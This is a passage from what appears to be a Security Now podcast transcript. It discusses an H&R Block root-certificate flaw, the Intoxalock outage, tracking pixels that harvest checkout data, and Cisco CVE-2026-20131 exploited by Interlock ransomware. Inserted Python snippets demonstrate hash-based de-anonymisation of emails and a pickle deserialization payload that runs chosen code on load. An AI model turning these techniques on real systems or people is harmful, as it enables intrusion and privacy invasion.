[00:53:52] which maps hrblock.localhost to 127.0.0.1. So now we have a certificate named hrblock.localhost with a unique public and private key pair that will only ever be trusted by a similarly unique root CA, which will itself expire a few months after it was created. Any local browser can now be directed

[00:54:20] to some unique port. I guess 443 if it's free, but you might want to use, you know, 8888, just for the sake of being out of the way. So, you know, hrblock.localhost:8888, and now you're able to access the built-in web server in order

[00:54:41] to view the H&R Block UI in a server-client relationship. And lastly, on its way out, the software's uninstaller should remove the short-lived root CA certificate, after it shuts down the local web server and deletes all of the product's files. So, as we've just seen in this example,

[00:55:08] if you really needed to do this for some reason, and I don't even see why you have to, because you could just, you know, give somebody a set of static certs that would only be useful for hrblock.localhost. But even if you wanted every instance to be unique, and I can see a benefit there, it can be done in a way that does not open any security

[00:55:35] holes. But that's not what H&R Block has done. Through very poor security design, sloppiness, and, as you said, apparently not caring, they've left behind a 23-year-lifetime, completely unconstrained CA root certificate, meaning it can sign TLS web certificates.

[00:56:00] It can sign code. It could be used for any malicious purpose you can imagine, left behind in the root store of every one of their users, with its matching key statically embedded in a shipping DLL so that it's known to the world. This makes you wish that our industry's software liability protections were not as virtually non-existent as they currently are. I mean, I'm sure somewhere

[00:56:30] in the license agreement that all users click on without reading, because you can't, you know, there's 25 pages of legalese, it says: by using this software, you agree to hold us harmless of any damage that may arise, even if we had been informed beforehand that such damage could occur. The license agreements all say that. And so it's like,

[00:56:55] eh, we can do anything we want to your computer. That's so frustrating to me. Because I was going to say, you know, I'm always curious. This person reached out to H&R Block. H&R Block had to know that, if this was truly coming from a security researcher, this was going to be made public. I would

[00:57:21] imagine that if you just heard from some random person who did not put themselves forth as a security researcher at all, they might go, oh, we can bury this, or this won't matter. But to say, basically, we don't care, to someone who is going to disclose it? That's the stuff where I'm like, I want to meet every person involved in every part of these decisions and just hear what their thinking is. Because what is their thinking, and why would they feel

[00:57:51] that this is not a big deal, when you're showing us how it can quickly become a big deal, and the responsibility there is vast? But as you pointed out, with the right agreements in place, they don't need to care, do they? No. It's frustrating. No. Speaking of frustrating,

[00:58:14] the company known as Intoxalock, gotta love the name, provides court-mandated automotive breathalyzers that are installed into the automobiles of people whom a court has determined should be required to provide proof of their sobriety through a quick

[00:58:43] built-in breathalyzer breath sample every single time they get behind the wheel and wish to drive their car. Now, since breathalyzer technology is tricky and can be a bit flaky, it requires periodic calibration by an authorized calibration facility for reliable operation.

[00:59:09] And the calibration facilities, it turns out, are all tied back to the mothership in the cloud that tracks and reports on all of this. Now that whole system generally works pretty well, but it turns out only so long as a cyber attack does not render Intoxalock's entire periodic

[00:59:37] calibration and reporting infrastructure inoperative. This is exactly what befell Intoxalock Saturday before last on March 14th. So today is the 24th, a full 10 days later, their calibration system remains offline. It's down. Wow.

[00:59:58] The trouble that's now facing a gradually growing number of drivers who need to prove their sobriety to their cars is that the system's firmware has been designed to enforce a zero tolerance policy. In general, if you don't get a recalibration when it's needed, you don't get to drive.

[01:00:28] Mm-hmm. And you cannot now recalibrate. As a result, as the recalibration system outage stretches on day after day, an increasing number of drivers are unable to use their automobiles. In some cases, Intoxalock is apparently, and this is on a state-by-state basis, apparently able to offer a 10-day calibration extension.

[01:00:55] But that appears, as I said, to be limited by state. A posting on their service status page explains: Effective immediately, service centers will be able to give your device a 10-day extension while our systems are being restored. Tennessee customers have a service date extension through Tuesday,

[01:01:23] March 24th. That's today. At this time, this extension is not available in Michigan or Washington. Wow. We're actively working toward a resolution and will notify you as soon as anything changes.

[01:01:40] So here we have an interesting case of people's physical lives being meaningfully impacted by a cyber event. Since the calibration and reporting system sounds like it's very database-driven, I would not be surprised to learn that Intoxalock, although this hasn't been publicly disclosed,

[01:02:11] had fallen victim to a generic ransomware attack which encrypted all of their systems. And in this case, consider the data that may also have been exfiltrated. Oh, wow. Yes. A list of all the people. Oh, my goodness. Yes. All of the people. Data that is extra personal, extra private, and extra sensitive,

[01:02:40] involving the identities and the habits, the drinking habits and the drinking-and-driving habits, of U.S. drivers who have been under court-mandated driving restrictions. That's not the sort of data anyone wishes to have floating around the internet. I would argue it makes a Social Security number look tame by comparison.

[01:03:03] Yeah, this is a huge blackmail target. Honestly, I was going to make some silly joke about, I wonder how many executives didn't get to work on time that day, and then you said what you said, and I thought, actually, it gave me goosebumps. This is horrible. This is awful. This is terrible. Yeah, it's not good. And they apparently are the go-to company for this service.

[01:03:32] Of course. I was looking to see what their status page says today. While you're looking for that, it also made me wonder if the calibration narrative is pushed by that company so that they can continue to make money even after those breathalyzers are installed. And of course, that's just supposition. But it is a very interesting

[01:04:00] thing to be one of the main companies providing what ends up being sort of a government-mandated device needing to have these regular check-ins. Yeah. And the good news is they have got their systems back up. I went to intoxalock.com slash status, and I'm getting a green bar, systems restored, services and installations resuming.

[01:04:30] So, and it's got lots of instructions for people who are inconvenienced, and there's a mobile app and so forth. So, note, if you received a service date extension in Tennessee during the temporary pause, please return to the service center today on March 24th. Failure to do so may result in an extension or full restart of the interlock program, whatever that means. So, anyway, the good news is, looks like

[01:05:00] they paid the ransom or restored from backups. We don't really know, but they are back up. But if nothing else, this demonstrates that our cyber world is increasingly interacting with the physical world. And, you know, here it caused people a lot of inconvenience.

[01:05:26] Especially when you've got all of your eggs in one basket. And as you said, even with the system restored, if this was a cyber attack and they exfiltrated all their database data, now there are serious extortion opportunities for anybody important who cares about keeping their past problems with drinking and driving private. Yeah, that's mortifying.

[01:05:55] Okay. So, exactly one week ago, last Tuesday, the 17th, Mozilla posted some welcome news under their heading, more reasons to love Firefox. I don't need any more reasons. I love Firefox, but okay. They wrote, what's new now and what's coming soon? They start their post off rather generically by writing, Firefox is for people who make their own choices online. Apparently, they're saying, you know,

[01:06:24] Chrome people are sheep. I don't know. From "what stays private," they wrote, "to the tools that help get things done," that commitment to choice shows up throughout the Firefox experience. The AI controls are just the latest example, meaning you can turn them off, making it possible to turn generative AI features off, on, or customize them feature by feature. Over the coming weeks, we'll be rolling out a

[01:06:52] series of updates that build on that. Expect more control where it matters, better protections in the background, and a few new tools that make everyday browsing better. You may even spot a fresh face of Firefox along the way. Okay. Then they, you know, they talk about the ability to turn off any generative AI, a new feature coming in the next Firefox 149, which will allow side-by-side page display,

[01:07:19] and the ability to write and attach notes to tabs. Okay. I'm not sure about the whole AI thing. The side-by-side webpage thing sounds as though it might come in handy for me for podcast production, since I'm often flipping back and forth between Google Docs, where I author the page, and the source

[01:07:45] information. So that would be cool. But the forthcoming new feature that caught my eye, and which I felt sure would interest our listeners, is in Firefox 149, which drops today, March 24th: its new free built-in VPN.

[01:08:08] They wrote, a free built-in VPN is coming to Firefox. Free VPNs can sometimes mean sketchy arrangements that end up compromising your privacy. And I've often said, you know, don't trust a free VPN from some sketchy provider. Certainly Mozilla is not that. They said, but ours is built

[01:08:34] into the world's most trusted browser. It routes your browser traffic through a proxy to hide your IP address and location while you browse, giving you stronger privacy and protection online with no extra downloads. Users will have 50 gigabytes of data monthly in the US, France, Germany, and UK to start.

[01:09:03] Available in Firefox 149, starting March 24th. In other words, as I said, today. Now, we know that there's been something of a gold rush to VPN services, driven by the increasing use of IP-based geolocation to limit underage access to age-restricted internet content and services. Since Firefox's desktop

[01:09:31] presence unfortunately continues to slip in terms of market share, down from 6.3% last year to just 4.2% desktop share this year, Mozilla may be hoping that the presence of a built-in

[01:09:51] free VPN service will help. It is worth noting also that it has not escaped the awareness of legislators, unfortunately, that people are rushing to use VPNs in order to get around state-based location age restrictions. And there has actually been some conversation about legislation to prohibit VPN use,

[01:10:21] which, you know, good luck with that. I mean, it's like, hey, you know, those TCP connections, they're pesky. I think we'd better outlaw TCP. Oh, Lord, could you imagine? Oh, come on, guys. Where does it stop? One place I know it doesn't stop is with our advertisers.

[01:10:46] And, Mikah, this would be a great place for us to take a break for a sponsor. I love that. What a great segue. Leo, take it away. Hey, guys, this episode of Security Now brought to you by OutSystems, the number one AI development platform. OutSystems helps businesses bridge the enterprise gap to their agentic future, where the constraints of the past give way to unlimited capacity and scale.

[01:11:15] OutSystems enables businesses of all sizes to build agents that actually do work. Things like take actions, make decisions, and integrate with data more than just answering questions. OutSystems provides the only AI development platform that's unified, agile, and enterprise-proven. Let me explain. Unified because you build, run, and govern apps and agents all in one platform, OutSystems.

[01:11:42] Agile because you now can innovate at the speed of AI, and importantly, without compromising quality or control. It's enterprise-proven because it's trusted by enterprises for some of the most important mission-critical AI applications and durable innovation. OutSystems. It's the secret weapon behind the world's most successful companies. And this isn't just for small apps.

[01:12:05] These are for massive, in many cases, massive, complex systems that are running banks, insurance companies, government services. OutSystems even helps companies with aging IT environments bridge the gap to the AI future without a rip-and-replace nightmare. It almost feels like you could do anything. OutSystems provides the safest and fastest way for an enterprise to go from, we need an AI strategy, to, yeah, we have a functioning AI application.

[01:12:33] Stop wondering how AI will change your business and start building the agents that will lead it. Visit OutSystems.com slash twit to see how the world's most innovative enterprises use OutSystems to build, deploy, and manage AI apps and agents quickly and cost-effectively without compromising reliability and security. That's O-U-T-S-Y-S-T-E-M-S dot com slash T-W-I-T to book a demo.

[01:13:01] OutSystems.com slash twit. Thank you so much for supporting the good work Steve does here at Security Now. Now back to the show. Indeed, we are back to the show. Take it away, Steve. Okay, so I just learned how far "tracking pixels" have come, and we now need to put that in air quotes, because they are so much more.

[01:13:29] They're easy to miss because, much like cookies, the code which their presence on any web page allows to run is completely hidden from us. I mean, it's not that you can't get it, but it's not easy to see. Last Wednesday, the 18th, the security researchers at Jscrambler shared what they had recently learned about what TikTok and Meta are both now doing.

[01:14:27] Their headline was "Beyond Analytics: The Silent Collection of Commercial Intelligence by TikTok and Meta Ad Pixels." Okay. And as we're going to see, Jscrambler's writing is targeted at web merchants who are voluntarily putting these insidious tracking pixels onto their sites,

[01:14:27] because this is not something that happens without the site provider's knowledge. This is something that they said, oh, yeah, we want the analytics or we want whatever we're getting in return. So every page that we serve will have a reference to some JavaScript back at Meta or TikTok or wherever,

[01:14:53] basically causing the user's web browser to pull in that resource and invoke whatever that script is. So here's what they explain. They wrote, TikTok and Meta's tracking pixels are quietly harvesting personal data, granular checkout interactions, and detailed commerce intelligence

[01:15:22] from the users of the websites that implement them. The collection is going far beyond what ad attribution requires, creating serious privacy compliance risks and competitive disadvantages for the businesses involved. Jscrambler conducted a runtime analysis of the ad pixels used by TikTok and Meta on actual websites,

[01:15:51] revealing that their default behavior requires immediate attention from every organization that employs them. The analysis focused on large companies in the retail, hospitality and health care sectors. However, it's worth noting that most businesses with an online presence use these tracking pixels on their websites as well.

[01:16:14] Okay, now I'm sure I don't need to tell our listeners that this is not something I, you know, with GRC, would ever consider doing. I'm annoyed that I've given Google any presence at all. But that little search box, you know, that's a pro-visitor feature. Other than that, GRC may be ancient-appearing, but it's also completely devoid of all modern web analytics,

[01:16:42] because I would rather protect my users' privacy. What's so insidious about this is that when a company says, okay, yes, we'll make a query to your ad server to pull in your ad pixel, they have no control over what it does once it gets there. That's the key point.

[01:17:12] It's very much like software that goes out and downloads some other software to enhance itself. If the behavior of that augmented software changes, then the overall product changes after the fact. Yeah. Anyway, Jscrambler continues writing,

[01:17:35] tracking pixels were once just a small snippet of code on a web page to confirm an ad impression or log a visit. Almost all websites use them to track user behavior, measure ad performance, and optimize marketing efforts. These pixels let businesses see which ads drive traffic, conversions, or sales,

[01:18:01] and provide data to retarget users who showed interest but might not have completed a purchase. What many website owners likely don't realize is that TikTok and Meta's pixels now go far beyond those traditional tracking tags. They collect user emails, phone numbers, and addresses,

[01:18:29] turning seemingly anonymous browsing data into persistent identifiable user profiles. TikTok's pixel, they write, creates three different data records for each user interaction. A primary event record of what the user did, such as viewing a product or adding to a cart.

[01:18:52] A metadata record and a performance record all connected using the same session ID. When personal information, like an email or phone number, appears on a page, TikTok's identity module processes it, normalizes it, and converts it into an SHA-256-style hashed identifier before sending it out. Meta takes a similar approach,

[01:19:22] hashing a wide range of fields, including first and last names, locations, and external identifiers. The hashes are deterministic, meaning they produce the same output for the same input each time. And because the hash is built from predictable data, like emails and phone numbers,

[01:19:45] it's easy to re-identify them by matching those hashes against existing hash data. Meaning that if Meta has your email address and hashes it, they get the same hash. If they have your phone number and hash it, they get the same hash. So when those hashes later pop up out on the web, they know it's you. There's no mystery there. You are not anonymized.

[01:20:13] And they write, it effectively eliminates anonymization, allowing platforms to recover original user data and build long-term behavioral profiles without the user's knowledge. In practice, this is like a candidate input matching process where emails or phone numbers are compiled or generated, hashed, and then compared against the target hashes to find matches.
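To make the "candidate input matching" process just described concrete, here's a small Python sketch. The emails, and the idea that this particular hash was captured from pixel traffic, are made up for illustration; the normalize-then-SHA-256 step mirrors what the report describes.

```python
import hashlib
import os

def normalize(email: str) -> str:
    # The kind of normalization the report describes: trim whitespace and
    # lowercase, so "Alice@Example.com " and "alice@example.com" collide.
    return email.strip().lower()

def pixel_hash(email: str) -> str:
    # Deterministic, unsalted SHA-256: same input always yields same output.
    return hashlib.sha256(normalize(email).encode("utf-8")).hexdigest()

# A hash as it might be captured from a site's outbound pixel traffic
# (hypothetical email).
captured = pixel_hash("Alice@Example.com ")

# "Candidate input matching": hash a list of already-known emails and
# compare against the captured value. Any match de-anonymizes the user.
known_emails = ["bob@example.com", "alice@example.com", "carol@example.com"]
matches = [e for e in known_emails if pixel_hash(e) == captured]
print(matches)  # -> ['alice@example.com']

# Contrast: mixing in a random salt would break this matching entirely,
# which is exactly why a platform doing identity resolution omits one.
salted = hashlib.sha256(os.urandom(16) + b"alice@example.com").hexdigest()
print(salted == captured)  # -> False
```

This is why a deterministic hash of a low-entropy identifier like an email address or phone number provides no real anonymity: anyone who already holds the identifier can regenerate the hash at will.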

[01:20:43] Identity resolution is only part of the problem. Jscrambler's research, they wrote, found that TikTok and Meta's ad pixels methodically harvest detailed product-level intelligence and entire customer journeys from merchant websites.

[01:21:05] Meta and TikTok's requests routinely include product names, unit prices, quantities, currency, and total cart values. They also logged specific checkout actions, such as add to cart or add payment info. In other words, stuff that is none of their business.

[01:21:29] Meta's telemetry even records the structure of checkout forms and buttons, providing insight into how a merchant's site is built. Wow. Are they making this data available to the people whose sites they're on? That's wild. This is not a trade. It's totally intrusive for Meta's benefit, and maybe they're selling it.

[01:21:59] Yeah. I mean, it's data that they are aggregating. So I'll just interrupt to note that if you might be thinking that none of this is any of Meta's effing business, I would agree with you wholeheartedly. It is so wrong and intrusive. They do it simply because they can.

[01:22:23] Because it's hidden, because web browsers will run by default any JavaScript they're given. And because there's no one looking, there's no one to stop them. Jscrambler continues. Well, and I'll note also, Meta can say, oh, but we hash the data. We anonymize it. No, you don't. You're not throwing in a random token with the hash, because if you did, it wouldn't be useful to you.

[01:22:53] It would then be purely random noise. So they said merchants are unlikely to be aware of the extent to which their websites share data with these tracking pixels.

[01:23:07] While they might know that pixels collect basic conversion information, much of the detailed product-level checkout stage and structural form data is automatically captured or passed through integrations like Shopify with little visibility.

[01:23:27] While businesses might think they're enabling only standard tracking, in reality, they are feeding third-party platforms with a deep, continuous view of their product catalog, pricing, and customer behavior that could potentially benefit larger rivals.

[01:23:48] The implications from a privacy, compliance, and sensitive data exposure standpoint should be very concerning for any organization using these pixels. Jscrambler found TikTok pixels capturing sensitive data even before a user had the opportunity to make a consent choice. Of course. And in some cases, even after a user had clicked reject all.

[01:24:18] We observed TikTok capturing physical addresses entered into store locator fields at major French and German retailers and transmitting the data back to their servers. Meta's pixel includes a feature called automatic events, which is enabled by default.

[01:24:41] The feature automatically scans page elements and captures information such as checkout interactions and visible payment card details, including the last digits, expiration date, and cardholder name. Why? I mean, I know why, but I just... Full, full spying. Full spying. Yeah, it's absolutely full spying.

[01:25:09] And to do it without any regard of just like... They're not even having to explain themselves because, as you've pointed out, no one's paying attention to this. Yep. Since this... They write, since this is the default behavior and not opt-in, merchants may not be aware that the pixel is collecting this information. The pixel. I love calling... It's like calling it a pixel. Makes it seem, oh, look, it's a little... Yeah, it's a 30-year-old... Exactly.

[01:25:37] On separate sites, Meta captured recipients' full names and delivery addresses when users selected address options during checkout. TikTok's pixel was observed exhibiting similar behavior, harvesting sensitive user data during the checkout process. This included partial payment card details and other personal data provided by the customer.

[01:26:05] Both TikTok and Meta's pixel code can load and begin transmitting data... hear it again: both TikTok and Meta's pixel code can load and begin transmitting data before the website's consent management system has time to block it. Wow.

[01:26:30] Meaning information can leave the browser before the user's choice is applied. Even more... And then they're covered... That's right. Right? They're covered legally because, oops, we asked the user, they said no, but it was too late. Yeah.

[01:26:46] Even more concerning is that data may be transmitted in clear text, occasionally within the request URL itself, exposing sensitive information to browser histories, server logs, intermediaries, and debugging tools. So it wasn't even well done, like a privacy-first approach.
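To see why data in the request URL itself is so leaky, here's a small illustration; the endpoint and field names are invented for the example:

```python
from urllib.parse import urlencode, urlparse, parse_qs

# Hypothetical tracking endpoint and abbreviated field names.
pii = {"em": "alice@example.com", "addr": "12 Rue Example, Paris"}
url = "https://tracker.example/collect?" + urlencode(pii)

# Everything after the '?' lands in browser history, proxy logs, and
# server access logs, and it persists long after the request is gone.
logged = parse_qs(urlparse(url).query)
print(logged)
# {'em': ['alice@example.com'], 'addr': ['12 Rue Example, Paris']}
```

A POST body at least keeps the personal data out of URL-level logging; putting it in the query string exposes it to every intermediary that records URLs.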

[01:27:07] They said this vulnerability stems not only from the pixel's data collection methods, but also from misconfigurations during its implementation or from issues with the website's underlying architecture. Consequently, the attack surface is significantly broader than a surface-level analysis would suggest.

[01:27:26] The behaviors Jscrambler documented put websites in direct conflict with GDPR, CCPA, and other major privacy regulations. The potential violation triggers include consent failures, inadvertent personal data transmission, and financial or address data exposed in logs that outlast the original request.

[01:27:55] In addition, the exposure of partial cardholder data and address information increases the risk for identity theft and secondary data breaches. From a competitive standpoint, merchants need to understand that the pixels they implement... Pixels? I mean, calling it a pixel is so wrong. Yep, I agree. The pixels they implement are not passive measurement tools.

[01:28:24] They are instead active data collection systems that feed proprietary commercial intelligence, such as pricing, product mix, conversions, and customer behavior, directly into the same global advertising platforms that every other merchant on those platforms, including rivals, relies on.

[01:28:50] Larger rivals with bigger ad budgets could benefit because the more data the platform collects from all merchants, the better its targeting becomes. Often, better targeting favors those with the most budget to spend on ads because there's more ad inventory to choose from.

[01:29:12] To manage these risks, they write, organizations need to do considerably more than just review a pixel's documentation. This involves auditing actual pixel configurations, meaning work, and implementing continuous monitoring to catch scope creep, meaning the pixel used to be a cute little thing that only targeted ads, but that was 10 years ago.

[01:29:42] Now, you're downloading a whole suite of spying intelligence within that cute little pixel's JavaScript. They finish: where a third-party script begins collecting more data than originally intended. Exactly so. Wow. Jeez Louise. That's frustrating. It's commerce, you know, getting away with everything it can. And of course, why wouldn't they?

[01:30:12] You know, we're talking meta. They're an aggressive commercial organization, and they've, you know, convinced the whole world to put their cute little tracking pixels everywhere. Yikes. Okay. Okay. As we know, no one is an island. Unfortunately, that's a problem if you don't get any messages.

[01:30:38] I suppose we should not be surprised that Russia's increasingly stringent and pervasive internet stranglehold is choking their own local companies.

[01:30:51] Russia's private sector is desperately asking their government to lift the recently imposed total bans on Telegram, WhatsApp, and other foreign messaging platforms.

[01:31:08] It seems that not everything needed to conduct business in Russia can be found within Mother Russia and that Russian entities need to work with foreign partners. And unfortunately, Russia is saying, no, we don't want you to be using, you know, they've got their own. I can't remember now what it's called.

[01:31:36] They did a native Russian messaging app, which, of course, no one wants to use because we know that Russia is spying on it. So nobody outside Russia wants to have anything to do with some Russian spyware. Who knows what it does once it gets into their machines? Another bit of news. I saw this blurb in a security news summary, and I thought, OK, well, that's interesting. Let me share it first.

[01:32:04] Then I'll tell everyone what I thought. The security news blurb was titled OpenClaw Phishing Campaign. And it just said: Threat actors are spamming GitHub issues and tagging other developers with fake promises of OpenClaw tokens.

[01:32:27] The plan is to lure the devs to phishing sites where they're asked to connect their crypto wallets, but are getting their accounts emptied. OK, so that's all we know. I don't ever want to see anyone hurt, of course, really. I don't ever.

[01:32:49] But anyone who would naively connect their crypto wallet containing any amount of crypto, which they're not entirely prepared to be separated from in the next moment, especially if they consider themselves to be savvy enough to be a developer,

[01:33:15] they would have a difficult time extracting much sympathy from me, even though I would never want them to be hurt. I mean, really, you know, you sometimes need an object lesson. And someone who's making those mistakes perhaps needs one. And I just hope it's not too expensive a lesson. I would certainly be sorry if anyone were scammed, but I would not be very surprised.

[01:33:40] So our takeaway here is please, please always be careful, you know, especially anytime you're connecting any wallet to any sort of automated system, which you cannot be 100 percent certain of. You know, really like set up a secondary wallet, transfer a little bit of working money there, and then, you know, use that if you must connect it to something.

[01:34:08] But, you know, not your wallet where you actually store any useful amount of money. Since we previously touched upon Cisco's very bad 10.0, CVE-2026-20127,

[01:34:29] which was that widely exploited authentication zero-day discovered while being exploited in Cisco's Catalyst SD-WAN enterprise product line. Really, anyone could be forgiven for confusing that one with Cisco's CVE-2026-20131.

[01:34:55] So not 27, no, 31, which is another, wait for it, CVSS 10.0 critical vulnerability in Cisco's systems. As I said at the top of the show, what would the Security Now podcast be without a brand new shiny Cisco CVSS critical 10.0?

[01:35:21] The NIST NVD, the National Vulnerability Database, says of the new one, 31, they write, a vulnerability in the web-based management interface, who would have guessed, of Cisco's Secure Firewall Management Center, apparently not that secure, software,

[01:35:47] could allow an unauthenticated remote attacker to execute arbitrary Java code as root on an affected device. In other words, there you go, Cisco 10.0. Woo-hoo! They wrote, this vulnerability is due to insecure deserialization of a user-supplied Java byte stream.

[01:36:14] An attacker could exploit this vulnerability by sending a crafted, serialized Java object to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary code on the device and elevate privileges to root. That's right.
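The flaw being quoted is Java deserialization, but the class of bug is language-agnostic. Here's a minimal Python sketch using pickle, Python's equivalent footgun, showing how the serialized bytes themselves can direct what code runs on load; the attacker_action function is a harmless stand-in for a real payload:

```python
import pickle

# Anything reachable at load time can be invoked; this harmless
# stand-in just records that attacker-chosen code actually ran.
executed = []

def attacker_action(msg: str) -> int:
    executed.append(msg)
    return 0

class Payload:
    def __reduce__(self):
        # The serialized byte stream itself says "call this function
        # with these arguments" when it is deserialized.
        return (attacker_action, ("pwned",))

crafted = pickle.dumps(Payload())   # the attacker's byte stream
pickle.loads(crafted)               # deserializing it runs the call
print(executed)  # ['pwned']
```

The fix is the same in both ecosystems: never feed untrusted bytes to a code-capable deserializer; use a data-only format (JSON, protobuf) or, in Java's case, a strict deserialization filter.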

[01:36:36] Unfortunately, most of the world that's not listening to this podcast has not caught up to the many continuing demonstrations that authentication does not work.

[01:36:50] If authentication did work, then unauthenticated hackers and attackers would not and could not be continuously breaking into supposedly protected systems in ways that bypass their authentication control. Right? I mean, one plus one equals two.

[01:37:11] Not to mention, oh, I don't know, allowing them to execute their arbitrary Java code as root on breached devices. And so what happens to enterprises who solely rely upon Cisco's broken authentication promises to protect their perimeters?

[01:37:33] Last Wednesday, the 18th, Amazon's threat intelligence posted their observation under the headline, Amazon threat intelligence teams identify interlock ransomware campaign targeting enterprise firewalls. Gee, which enterprise firewall do you think that could be?

[01:37:56] Amazon's threat hunters wrote, quote, Amazon threat intelligence has identified an active Interlock ransomware campaign exploiting CVE-2026-20131,

[01:38:13] a critical vulnerability in Cisco secure firewall management center software that could allow an unauthenticated remote attacker to execute arbitrary Java code as root on an affected device, which was disclosed by Cisco on March 4th, 2026. Now, that's an important date. March 4th, 2026. Disclosure means patch available on March 4th, 2026.

[01:38:43] They, Amazon, wrote: After Cisco's disclosure, Amazon threat intelligence began research into this vulnerability using Amazon's MadPot global sensor network, a system of honeypot servers that attract and monitor criminal cyber activity,

[01:39:07] while looking for any current or past exploits of this vulnerability. Our research found that Interlock was exploiting this vulnerability 36 days before its public disclosure, beginning January 26, 2026. This wasn't, they write, just another vulnerability exploit.

[01:39:36] Interlock had a zero day in their hands, giving them a five-week head start to compromise organizations before defenders even knew to look. Upon making this discovery, we shared our findings with Cisco to help support their investigation and protect customers. Okay, so just so that everyone is clear about the timing of this again,

[01:40:05] Amazon discovered exploitation of this zero day dating back as far as January 26th. And Cisco's announcement and patch wasn't made available until March 4th. So for at least 36 days or a little more than five weeks, only the bad guys knew of this and even fully patched and up-to-date Cisco secure firewalls.

[01:40:34] And the enterprises behind them were being compromised and falling victim to this Interlock ransomware campaign through no fault of their own. They were fully patched and updated. Amazon explained what they found, writing, a misconfigured infrastructure server, essentially a poorly secured staging area used by the attackers,

[01:41:01] They actually found a misconfigured infrastructure server of the attackers that exposed, they wrote, Interlock's complete operational toolkit. This rare mistake provided Amazon's security teams with visibility into the ransomware group's multi-staged attack chain,

[01:41:26] custom remote access Trojans, backdoor programs that give attackers control of compromised systems, reconnaissance scripts, meaning automated tools for mapping victim networks, and evasion techniques. In other words, Amazon has honeypots. The bad guys infected a honeypot. Amazon was able to use the infection to track backwards up into the attacker's infrastructure,

[01:41:53] which they found improperly set up so they were able to get in. Now, what if, maybe I'm writing a movie now, but what if that was just a reverse honeypot? And it points Amazon down the wrong route when they found all this data. That could be possible. Although, what they worked from was Cisco's fresh disclosure.

[01:42:17] So, they had evidence that that system was attacking their honeypot back as many as 36 days earlier using information that was not public. So, nobody knew how it could be used to get into their customers' machines. We're at an hour and a half in.

[01:42:45] Let's take a break, and then I'm going to finish up with what Amazon tells us about this interesting and unfortunately all too common Cisco vulnerability. I will say the magic words to summon Leo Laporte. Bippity boppity Laporte. Boo! Boo! You know, we talk about this all the time.

[01:43:13] The potential rewards of AI are far too great for any company to ignore, but so are the risks, right? Loss of sensitive data, attacks against enterprise-managed AI. Generative AI increases opportunities for threat actors, helping them to rapidly create phishing lures, write malicious code, and automate data extraction. Did you know there were 1.3 million instances of social security numbers leaked to AI applications last year?

[01:43:41] ChatGPT and Microsoft Copilot saw nearly 3.2 million data violations. Yikes! It's time to rethink your organization's safe use of public and private AI. And if you want to know more, just check out what Siva, the Director of Security and Infrastructure at Zuora, says about using Zscaler to prevent AI attacks. Watch. With Zscaler being in line in a security protection strategy helps us monitor all the traffic.

[01:44:10] So even if a bad actor were to use AI, because we have a tight security framework around our endpoint, helps us proactively prevent that activity from happening. AI is tremendous in terms of its opportunities, but it also brings in challenges. We're confident that Zscaler is going to help us ensure that we're not slowed down by security challenges, but continue to take advantage of all the advancements. Thank you, Siva.

[01:44:35] With Zscaler Zero Trust plus AI, you can safely adopt generative AI and private AI to boost productivity across the business. Their Zero Trust architecture plus AI helps you reduce the risks of AI-related data loss and protects against AI attacks to guarantee greater productivity and compliance. Learn more at zscaler.com slash security. That's zscaler.com slash security.

[01:45:03] We thank them so much for supporting Security Now. Now I see Steve's all caffeinated, so let's get back to the show. Let's do it, Steve. How did he know? That's a big cup. Okay, so just to finish on Amazon's threat intelligence, they wrote, AWS infrastructure and customer workloads on AWS were not observed to be involved in this campaign, meaning Cisco customers, not Amazon customers.

[01:45:32] They said, This advisory shares comprehensive technical analysis and indicators of compromise to help organizations identify potential compromise and defend against Interlock's operations, right? I mean, this was going on for 36 days. Anybody who the bad guys could find who had this firewall may well have been compromised. So, you know, a true problem. They said,

[01:46:00] Amazon threat intelligence identified threat activity potentially related to CVE-2026-20131 beginning January 26th. Observed activity involved HTTP requests to a specific path in the affected software. Request bodies contained Java code execution attempts and two embedded URLs.

[01:46:23] One used to deliver configuration data supporting the exploit and another designed to confirm successful exploitation by causing a vulnerable target to perform an HTTP PUT request and upload a generated file. So that was the compromised system sending stuff back up to the bad guys' infrastructure. They said multiple variations of these URLs were observed across different exploit attempts.

[01:46:51] To advance the investigation and obtain additional threat intelligence, we performed (so they, Amazon, were pretending to be infected) the expected HTTP PUT request with the anticipated file content. Essentially, we pretended to be a successfully compromised system. This successfully prompted Interlock to proceed to the next stage,

[01:47:20] issuing commands to fetch and execute a malicious ELF binary, a Linux executable file from a remote server. So that suggests that the Cisco firewall is Linux-based. And so this was downloading Linux malware into and to be run by the Cisco firewall. They said when analysts retrieved the binary, they discovered the same host, that is the hacker-controlled server,

[01:47:50] is used for distributing Interlock's entire operational toolkit. The exposed infrastructure organized artifacts into separate paths corresponding to individual targets, with the same paths used for both downloading tools to compromise hosts and uploading operational artifacts back to the staging server. And if they were able to look around in there, they may have seen all the uploads from all the infected systems.

[01:48:17] No one's talking about how many systems were infected, but my guess is Amazon knows and Cisco probably knows and hopefully is not happy about it. They said that ELF binary and associated artifacts are attributable to the Interlock ransomware family based on convergent technical and operational indicators. The embedded ransom note, the ransom note and the Tor negotiation portal

[01:48:43] are consistent with Interlock's established branding and infrastructure. The ransom note's invocation of multiple data protection regulations. Oh, you've got to love that. You are in violation: we just attacked you and infected you, and now we've exfiltrated your data, which puts you in violation of various data protection regulations. Congratulations. Oh, by the way. Yes. Congratulations. So they said,

[01:49:12] the ransom note's invocation of multiple data protection regulations reflects Interlock's documented practice of citing regulatory exposure to pressure victims, essentially threatening organizations, not just with data encryption and exfiltration, but with regulatory fines and compliance violations. Wow. It's clever. It's clever.

[01:49:41] They're bold. The campaign specific organization identifier embedded in the note aligns with Interlock's per victim tracking model. Interlock has historically targeted specific sectors where operational disruption creates maximum pressure for payment. Education represents the largest share of their activity,

[01:50:04] followed by engineering, architecture, and construction firms, manufacturing and industrial organizations, healthcare providers, and government and public sector entities. Amazon's posting then goes into very interesting and rich detail. It's certainly relevant to anyone who may have fallen victim to this or anyone who might worry that they may have. But what matters most is the way Amazon's threat intelligence group concludes.

[01:50:34] They write, The real story here isn't just about one vulnerability or one ransomware group. It's about the fundamental challenge zero-day exploits pose to every security model. When attackers exploit vulnerabilities before patches exist.

[01:50:57] Even the most diligent patching programs cannot protect you during that critical window. This is precisely why defense in depth is essential. Layered security controls provide protection when any single control fails or hasn't yet been deployed. Rapid patching remains foundational in vulnerability management.

[01:51:27] But defense in depth requires organizations, I'm sorry, helps organizations not to be defenseless during the window between exploit and patch. Right? So there you have it.

